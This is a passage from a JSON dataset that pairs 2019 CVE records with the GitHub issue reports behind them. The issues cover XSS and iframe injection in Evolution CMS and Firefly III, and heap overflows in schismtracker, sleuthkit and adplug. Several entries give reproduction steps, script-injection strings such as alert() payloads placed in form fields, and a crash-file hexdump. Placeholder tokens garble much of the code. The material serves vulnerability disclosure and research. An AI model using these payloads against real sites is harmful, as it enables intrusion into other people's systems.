(character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG }",
  37319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37320. "severity": "MEDIUM",
  37321. "baseScore": 5.4,
  37322. "impactScore": 2.7,
  37323. "exploitabilityScore": 2.3
  37324. },
  37325. {
  37326. "CVE_ID": "CVE-2019-14518",
  37327. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1043",
  37328. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1043",
  37329. "Repo_new": "evolution-cms/evolution",
  37330. "Issue_Created_At": "2019-03-22T15:07:24Z",
  37331. "description": "Reflected XSS Vulnerability. Reflected XSS Vulnerability Description: The second and the most common type of XSS is Reflected XSS APITAG persistent XSS). In this case, the attacker\u2019s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server. The reflected XSS payload is then executed in the user\u2019s browser. Reflected XSS is not a persistent attack, so the attacker needs to deliver the payload to each victim. These attacks are often made using social networks. Login to application FILETAG Goto the Document Manager and view the list of documents FILETAG there is a search perimeter insert xss payload as APITAG APITAG FILETAG Effected URL URLTAG FILETAG Mitigation: Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG } While the issue was investigated, there were some backend updates done which apparently automatically mysteriously fixed the issue.",
  37332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37333. "severity": "MEDIUM",
  37334. "baseScore": 5.4,
  37335. "impactScore": 2.7,
  37336. "exploitabilityScore": 2.3
  37337. },
  37338. {
  37339. "CVE_ID": "CVE-2019-14518",
  37340. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1042",
  37341. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1042",
  37342. "Repo_new": "evolution-cms/evolution",
  37343. "Issue_Created_At": "2019-03-22T14:41:23Z",
  37344. "description": "I Frame Injection Vulnerability. I Frame Injection Vulnerability Risk Description Malware Attackers use this APITAG and include the malware websites. They are able to include the webpage one pixel square APITAG won\u2019t able to see it in webpage). Obfuscate the APITAG that will run automatically from that included page so that it looks something like NUMBERTAG C NUMBERTAG D NUMBERTAG F \u2013 leaving no obvious clue that it\u2019s malicious. Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more. POC Login to Evolution CMS application FILETAG Goto the template location and try to create New template FILETAG insert the payload in description location, template name as \"/> APITAG APITAG FILETAG save and close the template. FILETAG Now open the template list like below you will get Iframe which is running malicious. FILETAG Mitigation NUMBERTAG you should include the Content Security Policy frame ancestors header in your HTTP response to prevent your website being loaded in a frame. Some older browsers may not have support for this header, so also use the X Frame Options header with value DENY, SAMEORIGIN or ALLOW FROM uri. X Frame Options takes precedence over CSP frame ancestors in some browsers NUMBERTAG You could additionally have some Javascript \"frame breaker\" code that will prevent your website from being \"framed\" in older browsers. \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u00a0 \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG }",
  37345. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37346. "severity": "MEDIUM",
  37347. "baseScore": 5.4,
  37348. "impactScore": 2.7,
  37349. "exploitabilityScore": 2.3
  37350. },
  37351. {
  37352. "CVE_ID": "CVE-2019-14523",
  37353. "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/202",
  37354. "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/202",
  37355. "Repo_new": "schismtracker/schismtracker",
  37356. "Issue_Created_At": "2019-08-01T14:40:50Z",
  37357. "description": "Heap Overflow while parsing Amiga Oktalyzer files. Hey schismtracker team, I would like to report a security vulnerability in Amiga Oktalyzer parser (fmt/okt.c). There is a heap overflow in the way the parser handles Song's orderlist in Amiga Oktalyzer file format. The fmt_okt_load_song function, takes the NUMBERTAG bytes long length (plen) of the song orderlist directly from the file. At the end of the function, it try to memser the structure, however the size of the memset is calculated by substracting MAX_ORDERS minus the plen NUMBERTAG As a consequence, if a file is created with a plen bigger than MAX_ORDER NUMBERTAG it will underflow and become a big unsigned integer that will make memset overflow beyond their boundaries. int fmt_okt_load_song(song_t song, slurp_t fp, unsigned int lflags) { int plen NUMBERTAG how many positions in the orderlist are valid while (!slurp_eof(fp)) { uint NUMBERTAG t blklen; // length of this block size_t nextpos; // ... and start of next one slurp_read(fp, tag NUMBERTAG slurp_read(fp, &blklen NUMBERTAG blklen = APITAG nextpos = slurp_tell(fp) + blklen; [...] switch (OKT_BLOCK(tag NUMBERTAG tag NUMBERTAG tag NUMBERTAG tag NUMBERTAG case OKT_BLK_PLEN: if (!(readflags & OKT_HAS_PLEN)) { readflags |= OKT_HAS_PLEN; slurp_read(fp, &w NUMBERTAG plen = APITAG } [...] song >pan_separation NUMBERTAG memset(song >orderlist + plen, ORDER_LAST, MAX_ORDERS plen NUMBERTAG Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37358. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37359. "severity": "HIGH",
  37360. "baseScore": 7.8,
  37361. "impactScore": 5.9,
  37362. "exploitabilityScore": 1.8
  37363. },
  37364. {
  37365. "CVE_ID": "CVE-2019-14524",
  37366. "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/201",
  37367. "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/201",
  37368. "Repo_new": "schismtracker/schismtracker",
  37369. "Issue_Created_At": "2019-08-01T14:12:19Z",
  37370. "description": "Heap Overflow on parsing MTM. Hey schismtracker team, I would like to report a security vulnerability in schismtracker MTM parser (fmt/mtm.c). There is a potential heap overflow on the way schismtracker parse MTM files, specifically while working with song patterns. On fmt_mtm_load_song, it takes the number of patterns from the file in line NUMBERTAG npat = slurp_getc(fp); And later in code, there is a loop that fills the song patterns and patterns_sizethat is defined as: define MAX_PATTERNS NUMBERTAG song_note_t patterns[MAX_PATTERNS]; // Patterns uint NUMBERTAG t pattern_size[MAX_PATTERNS]; // Pattern Lengths The loop takes the value of npat directly, this is a one byte long field which maximun size can hold up to NUMBERTAG entries. / patterns / for (pat NUMBERTAG pat APITAG patterns[pat] = APITAG NUMBERTAG song >pattern_size[pat] = song >pattern_alloc_size[pat NUMBERTAG tracknote = trackdata[n]; Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37371. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37372. "severity": "HIGH",
  37373. "baseScore": 7.8,
  37374. "impactScore": 5.9,
  37375. "exploitabilityScore": 1.8
  37376. },
  37377. {
  37378. "CVE_ID": "CVE-2019-14525",
  37379. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5753",
  37380. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5753",
  37381. "Repo_new": "octopusdeploy/issues",
  37382. "Issue_Created_At": "2019-08-02T02:16:28Z",
  37383. "description": "Fix some sensitive value handling in the server config API/portal UI. The bug A couple of values aren't being correctly handled as sensitive on one of the server configuration APIs/pages. Relates to APITAG NUMBERTAG",
  37384. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  37385. "severity": "MEDIUM",
  37386. "baseScore": 4.9,
  37387. "impactScore": 3.6,
  37388. "exploitabilityScore": 1.2
  37389. },
  37390. {
  37391. "CVE_ID": "CVE-2019-14525",
  37392. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5754",
  37393. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5754",
  37394. "Repo_new": "octopusdeploy/issues",
  37395. "Issue_Created_At": "2019-08-02T02:34:17Z",
  37396. "description": "Fix some sensitive value handling in the server config API/portal UI. The bug A couple of values aren't being correctly handled as sensitive on one of the server configuration APIs/pages. Relates to APITAG NUMBERTAG",
  37397. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  37398. "severity": "MEDIUM",
  37399. "baseScore": 4.9,
  37400. "impactScore": 3.6,
  37401. "exploitabilityScore": 1.2
  37402. },
  37403. {
  37404. "CVE_ID": "CVE-2019-14531",
  37405. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1576",
  37406. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1576",
  37407. "Repo_new": "sleuthkit/sleuthkit",
  37408. "Issue_Created_At": "2019-07-22T16:53:19Z",
  37409. "description": "Out of Bounds read in ISO NUMBERTAG Dear sleuthkit team, I would like to report a security vulnerability in APITAG There is an out of bound read on iso NUMBERTAG while parsing System Use Sharing Protocol data. On the parse_susp function, while parsing an ER entry, it will try to read the different Extension strings. However, there is no control of the size fields and they will read out of the buf size bound. else if ((head >sig FILETAG",
  37410. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37411. "severity": "CRITICAL",
  37412. "baseScore": 9.8,
  37413. "impactScore": 5.9,
  37414. "exploitabilityScore": 3.9
  37415. },
  37416. {
  37417. "CVE_ID": "CVE-2019-14532",
  37418. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1575",
  37419. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1575",
  37420. "Repo_new": "sleuthkit/sleuthkit",
  37421. "Issue_Created_At": "2019-07-22T16:28:14Z",
  37422. "description": "Off by One Underflow on hfind. Dear sleuthkit team, I would like to report a security vulnerability in APITAG There is an off by one overwrite due to an underflow on hfind.cpp while using a bogus hash table. On the main function, when a hash table is used, it read the first line and try to remove the newline character, however, if a bogus hash file is used with a NULL as the first character, the fgets will work however when it try to clean the new line using strlen(buf), it will return zero and as a consequence a zero will be written at the position buf NUMBERTAG int main(int argc, char arg NUMBERTAG int ch; TSK_TCHAR idx_type = NULL; TSK_TCHAR db_file = NULL; [..] char buf NUMBERTAG if (NULL == fgets(buf NUMBERTAG handle)) { break; } endif \u00a0 / Remove the newline / buf[strlen(buf NUMBERTAG A simple proof of concept consists of using a hash lookup file with NULL as the first character: $ hfind f boom.hex any.db PATHTAG hexdump /tmp/boom.he NUMBERTAG aa NUMBERTAG aaaa aaaa aaaa aaaa aaaa aaaa aaaa NUMBERTAG aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa NUMBERTAG aaaa aaaa NUMBERTAG aa The exact line could be found here: URLTAG Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37424. "severity": "CRITICAL",
  37425. "baseScore": 9.8,
  37426. "impactScore": 5.9,
  37427. "exploitabilityScore": 3.9
  37428. },
  37429. {
  37430. "CVE_ID": "CVE-2019-14540",
  37431. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2449",
  37432. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2449",
  37433. "Repo_new": "fasterxml/jackson-databind",
  37434. "Issue_Created_At": "2019-09-10T17:06:52Z",
  37435. "description": "Block one more gadget type (no CVE allocated yet). Similar to other Unbounded Polymorphic Type (default typing, usually) vulnerabilities, a new report that is loosely related to (already blocked) type APITAG has been received. This is a placeholder for now, more details will be added once vulnerability has been evaluated and, if found applicable, fixed.",
  37436. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37437. "severity": "CRITICAL",
  37438. "baseScore": 9.8,
  37439. "impactScore": 5.9,
  37440. "exploitabilityScore": 3.9
  37441. },
  37442. {
  37443. "CVE_ID": "CVE-2019-14540",
  37444. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2410",
  37445. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2410",
  37446. "Repo_new": "fasterxml/jackson-databind",
  37447. "Issue_Created_At": "2019-08-06T02:03:28Z",
  37448. "description": "Block one more gadget type ( CVETAG ). Hey, buddy. I found a new gadget can be used to exploit jackson which can cause RCE. I had sent the report to EMAILTAG .",
  37449. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37450. "severity": "CRITICAL",
  37451. "baseScore": 9.8,
  37452. "impactScore": 5.9,
  37453. "exploitabilityScore": 3.9
  37454. },
  37455. {
  37456. "CVE_ID": "CVE-2019-14544",
  37457. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5764",
  37458. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5764",
  37459. "Repo_new": "gogs/gogs",
  37460. "Issue_Created_At": "2019-08-01T11:59:15Z",
  37461. "description": "Incorrect access control. Gogs version (or commit ref): newest(e NUMBERTAG Can you reproduce the bug at FILETAG Yes I discovered a misconfigured access control in the newest gogs, I think it's some kind of bug. Can you confirm u APITAG is still the best email to send more details? Best, Manasseh Zhou MENTIONTAG",
  37462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37463. "severity": "CRITICAL",
  37464. "baseScore": 9.8,
  37465. "impactScore": 5.9,
  37466. "exploitabilityScore": 3.9
  37467. },
  37468. {
  37469. "CVE_ID": "CVE-2019-14546",
  37470. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1369",
  37471. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1369",
  37472. "Repo_new": "espocrm/espocrm",
  37473. "Issue_Created_At": "2019-07-29T15:31:19Z",
  37474. "description": "Stored XSS to Complete Account Takeover. Hello Team, I found a Stored XSS on an endpoint and with that I'm able to takeover any account possible. Its a bit of a lengthy report, should I write here or mail to some id for privacy. If possible could you set up a meeting so that I explain you the whole process.",
  37475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37476. "severity": "MEDIUM",
  37477. "baseScore": 5.4,
  37478. "impactScore": 2.7,
  37479. "exploitabilityScore": 2.3
  37480. },
  37481. {
  37482. "CVE_ID": "CVE-2019-14653",
  37483. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/715",
  37484. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/715",
  37485. "Repo_new": "pandao/editor.md",
  37486. "Issue_Created_At": "2019-08-02T08:05:43Z",
  37487. "description": "XSS vulnerability on APITAG and APITAG .. Summary Because there are no attribute filters in the abbr and sup tags, an attacker can trigger XSS on websites which is using FILETAG . CVE Will be assigned soon. Payloads This will execute APITAG when you move the mouse on any part of the page. CODETAG Images APITAG",
  37488. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37489. "severity": "MEDIUM",
  37490. "baseScore": 6.1,
  37491. "impactScore": 2.7,
  37492. "exploitabilityScore": 2.8
  37493. },
  37494. {
  37495. "CVE_ID": "CVE-2019-14667",
  37496. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2363",
  37497. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2363",
  37498. "Repo_new": "firefly-iii/firefly-iii",
  37499. "Issue_Created_At": "2019-08-02T09:26:36Z",
  37500. "description": "Multiple Stored XSS in convert transactions.. Description Current version of Firefly III Version NUMBERTAG is vulnerable to multiple stored XSS due to lack of filtration of user supplied data in transaction description field and in asset account name. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit links below. Steps to reproduce NUMBERTAG Add NUMBERTAG asset accounts with names \" APITAG alert(\"XSS in source asset account\") APITAG \", \" APITAG alert(\"XSS in destination asset account\") APITAG NUMBERTAG Add new transaction with description \" APITAG alert(\"XSS in transaction description\") APITAG \". You can add new deposit or withdrawal or transfer NUMBERTAG isit CODETAG See NUMBERTAG alerts (one description alert, two source account alerts, two destination account alerts). POC image FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37501. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37502. "severity": "MEDIUM",
  37503. "baseScore": 6.1,
  37504. "impactScore": 2.7,
  37505. "exploitabilityScore": 2.8
  37506. },
  37507. {
  37508. "CVE_ID": "CVE-2019-14668",
  37509. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2364",
  37510. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2364",
  37511. "Repo_new": "firefly-iii/firefly-iii",
  37512. "Issue_Created_At": "2019-08-02T09:40:51Z",
  37513. "description": "Stored XSS in delete link transactions. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in transaction description field. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit links below. Steps to reproduce NUMBERTAG Add NUMBERTAG new transactions with description \" APITAG alert(\"XSS in transaction description\"); APITAG \" and \" APITAG alert(\"XSS in transaction description NUMBERTAG APITAG NUMBERTAG Link them together NUMBERTAG isit APITAG You can navigate there from transaction menu. See NUMBERTAG alerts (two first transaction description payloads, two second transaction description payloads) POC Image FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37514. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37515. "severity": "MEDIUM",
  37516. "baseScore": 5.4,
  37517. "impactScore": 2.7,
  37518. "exploitabilityScore": 2.3
  37519. },
  37520. {
  37521. "CVE_ID": "CVE-2019-14669",
  37522. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2366",
  37523. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2366",
  37524. "Repo_new": "firefly-iii/firefly-iii",
  37525. "Issue_Created_At": "2019-08-02T10:08:18Z",
  37526. "description": "Stored XSS in reports/audit. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in asset account name. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Add two assets accounts with names \" APITAG alert(\"account with no activity\"); APITAG \" and \" APITAG alert(\"active account\"); APITAG NUMBERTAG Do some activity with active account NUMBERTAG isit PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37528. "severity": "MEDIUM",
  37529. "baseScore": 5.4,
  37530. "impactScore": 2.7,
  37531. "exploitabilityScore": 2.3
  37532. },
  37533. {
  37534. "CVE_ID": "CVE-2019-14670",
  37535. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2365",
  37536. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2365",
  37537. "Repo_new": "firefly-iii/firefly-iii",
  37538. "Issue_Created_At": "2019-08-02T09:48:29Z",
  37539. "description": "Stored XSS in create from bill rule. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in bill name field Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Add new bill with name \" APITAG alert(\"XSS in bill rule\") APITAG NUMBERTAG isit PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37541. "severity": "MEDIUM",
  37542. "baseScore": 5.4,
  37543. "impactScore": 2.7,
  37544. "exploitabilityScore": 2.3
  37545. },
  37546. {
  37547. "CVE_ID": "CVE-2019-14671",
  37548. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2367",
  37549. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2367",
  37550. "Repo_new": "firefly-iii/firefly-iii",
  37551. "Issue_Created_At": "2019-08-02T11:30:27Z",
  37552. "description": "Local file enumeration vulnerability. . Bug description Current version of Firefly III Version NUMBERTAG is vulnerable to local files enumeration. Steps to reproduce NUMBERTAG isit APITAG NUMBERTAG Send that request: ERRORTAG You will be redirected to URLTAG where you can see ERRORTAG Send request above again with PATHTAG you will see ERRORTAG NUMBERTAG Error codes are different, and malicious attacker can use it to gain information about local file system, enumerate files and paths, bruteforce file structure. That issue appeared because you use libcurl, without proper protocol sanitizing.",
  37553. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  37554. "severity": "LOW",
  37555. "baseScore": 3.3,
  37556. "impactScore": 1.4,
  37557. "exploitabilityScore": 1.8
  37558. },
  37559. {
  37560. "CVE_ID": "CVE-2019-14672",
  37561. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2370",
  37562. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2370",
  37563. "Repo_new": "firefly-iii/firefly-iii",
  37564. "Issue_Created_At": "2019-08-02T20:56:28Z",
  37565. "description": "Stored XSS in liability error.. Bug description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in liability name field. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Set a new liability account with name \" APITAG alert(\"XSS in liability error\") APITAG \" , also set APITAG amount of debt\" to NUMBERTAG start date of debt\" to any date, \"interest\" to NUMBERTAG Save it. FILETAG NUMBERTAG Go to PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37566. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37567. "severity": "MEDIUM",
  37568. "baseScore": 5.4,
  37569. "impactScore": 2.7,
  37570. "exploitabilityScore": 2.3
  37571. },
  37572. {
  37573. "CVE_ID": "CVE-2019-14690",
  37574. "Issue_Url_old": "https://github.com/adplug/adplug/issues/85",
  37575. "Issue_Url_new": "https://github.com/adplug/adplug/issues/85",
  37576. "Repo_new": "adplug/adplug",
  37577. "Issue_Created_At": "2019-08-06T09:54:44Z",
  37578. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/bmf.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
